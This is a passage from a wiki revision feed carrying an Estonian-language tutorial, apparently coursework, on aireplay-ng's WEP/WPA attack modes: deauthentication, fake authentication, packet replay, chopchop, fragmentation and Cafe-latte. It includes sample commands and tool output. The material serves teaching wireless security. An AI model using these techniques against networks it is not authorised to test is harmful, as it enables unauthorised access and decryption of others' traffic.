Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30936</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30936"/>
		<updated>2011-05-10T08:55:16Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Shared Key Authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, broadcast disconnect on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.(?)&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud handshake&#039;id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
